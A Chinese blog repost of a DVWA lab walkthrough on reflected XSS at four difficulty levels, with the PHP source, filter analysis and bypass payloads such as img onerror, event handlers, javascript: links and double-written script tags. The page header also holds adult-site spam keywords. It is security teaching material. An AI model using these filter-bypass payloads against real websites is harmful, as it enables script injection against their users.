日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

DVWA--XSS(Reflected)(全难度)

發(fā)布時(shí)間:2023/12/14 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 DVWA--XSS(Reflected)(全难度) 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

DVWA–XSS(Reflected)(反射型XSS)

原理參考:網(wǎng)絡(luò)安全筆記-99-滲透-XSS

邏輯

輸入name,回顯name

難度分級(jí)

Low

核心代碼

<?phpheader ("X-XSS-Protection: 0");// Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Feedback for end userecho '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; }?>

分析

header:發(fā)送原生HTTP頭

array_key_exists(key,array):檢查數(shù)組里是否有指定的鍵名或索引。key:要檢查的鍵,被檢查的數(shù)組

name參數(shù)是GET型,在url里。

直接輸出name參數(shù),沒(méi)有任何過(guò)濾

利用

直接使用script標(biāo)簽即可利用:

<script>alert(/xss/)</script>

Medium

核心代碼

<?phpheader ("X-XSS-Protection: 0");// Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Get input$name = str_replace( '<script>', '', $_GET[ 'name' ] );// Feedback for end userecho "<pre>Hello ${name}</pre>"; }?>

分析

使用了str_replace()替換函數(shù)。

利用

其他標(biāo)簽事件利用或者偽協(xié)議利用,或雙寫,大小寫,編碼繞過(guò)等。

  • <img src="#" onerror="alert(/xss/)">
  • <input type="text" onkeydown='alert(/xss/)'>
  • <input onclick="alert(/xss/)">
  • <a href="javascript:alert(/xss/)">click</a>
  • <sc<script>ript>alert(/xss/)</script>

High

核心代碼

<?phpheader ("X-XSS-Protection: 0");// Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Get input$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );// Feedback for end userecho "<pre>Hello ${name}</pre>"; }?>

分析

preg_replace(pattern,replacement,subject):執(zhí)行正則表達(dá)的搜索與替換

pattern:搜索模式

replacement:進(jìn)行替換的值

subject:原字符串

將script每個(gè)字母之間的內(nèi)容都替換為空

利用

script標(biāo)簽不可用了,可以選擇其他標(biāo)簽,觸發(fā)事件。

  • <img src="#" onerror="alert(/xss/)">

Impossible

核心代碼

<?php// Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );// Get input$name = htmlspecialchars( $_GET[ 'name' ] );// Feedback for end userecho "<pre>Hello ${name}</pre>"; }// Generate Anti-CSRF token generateSessionToken();?>

分析

htmlspecialchars():將特殊字符轉(zhuǎn)換為 HTML 實(shí)體。

引入了Token機(jī)制。

利用

無(wú)

總結(jié)

以上是生活随笔為你收集整理的DVWA--XSS(Reflected)(全难度)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。